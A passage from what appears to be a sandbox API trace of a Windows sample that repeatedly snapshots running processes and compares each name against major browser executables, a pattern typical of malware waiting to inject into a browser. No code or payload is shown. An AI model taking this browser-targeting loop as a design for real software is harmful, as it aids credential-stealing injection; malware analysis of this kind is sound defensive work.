cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.304] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.305] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0184.305] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0184.305] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0184.305] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.305] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0184.305] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0184.305] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0184.305] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0184.305] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0184.305] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.305] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.306] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.306] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0184.306] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0184.306] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0184.306] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.306] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0184.306] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0184.306] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0184.306] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0184.306] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0184.306] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.306] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.308] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.308] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0184.308] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0184.308] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0184.308] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.308] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.309] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0184.309] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0184.309] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0184.309] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0184.309] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.309] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0184.309] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0184.309] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0184.309] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0184.310] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0184.310] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.310] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0184.310] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0184.310] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0184.310] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0184.310] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0184.310] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.310] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.311] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0184.311] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0184.311] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0184.311] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0184.311] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.311] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.311] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0184.311] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0184.311] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0184.312] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0184.312] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.312] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.312] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0184.312] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0184.312] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0184.312] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0184.312] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.312] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.313] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0184.313] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0184.313] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0184.313] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0184.313] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.313] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0184.313] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0184.313] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0184.313] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0184.313] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0184.313] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0184.313] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0184.314] CloseHandle (hObject=0xe8) returned 1 [0184.314] Sleep (dwMilliseconds=0x3e8) [0185.321] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0185.323] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.323] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0185.323] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0185.323] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0185.323] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0185.323] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0185.323] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0185.324] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0185.324] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0185.324] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0185.324] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0185.324] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0185.324] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0185.324] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0185.324] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0185.324] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0185.325] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0185.325] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.325] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0185.325] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0185.325] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0185.325] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0185.325] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0185.325] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.325] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0185.326] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0185.326] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0185.326] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0185.326] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0185.326] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.326] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0185.326] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0185.326] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0185.326] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0185.326] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0185.326] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.326] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0185.327] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0185.327] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0185.327] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0185.327] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0185.327] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.327] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0185.327] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0185.327] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0185.327] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0185.327] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0185.327] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.328] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0185.328] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0185.328] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0185.328] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0185.328] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0185.328] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.328] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0185.329] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0185.329] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0185.329] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0185.329] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0185.329] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.329] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.329] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0185.329] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0185.329] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0185.329] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0185.329] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.329] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.330] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0185.330] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0185.330] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0185.330] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0185.330] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.330] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.330] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0185.330] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0185.330] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0185.330] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0185.330] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.330] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.331] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0185.331] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0185.331] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0185.331] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0185.331] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.331] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.332] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0185.332] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0185.332] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0185.332] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0185.332] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.332] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0185.332] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0185.332] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0185.332] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0185.332] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0185.332] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.332] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.333] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0185.333] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0185.333] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0185.333] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0185.333] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.333] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.333] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0185.333] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0185.333] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0185.333] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0185.333] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.333] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0185.334] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0185.334] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0185.334] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0185.334] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0185.334] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.334] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0185.334] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0185.334] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0185.335] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0185.335] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0185.335] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.335] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0185.335] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0185.335] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0185.335] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0185.335] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0185.335] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.335] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.336] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0185.336] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0185.336] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0185.336] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0185.336] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.336] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0185.336] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0185.336] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0185.336] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0185.336] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0185.336] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.336] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0185.337] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0185.337] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned 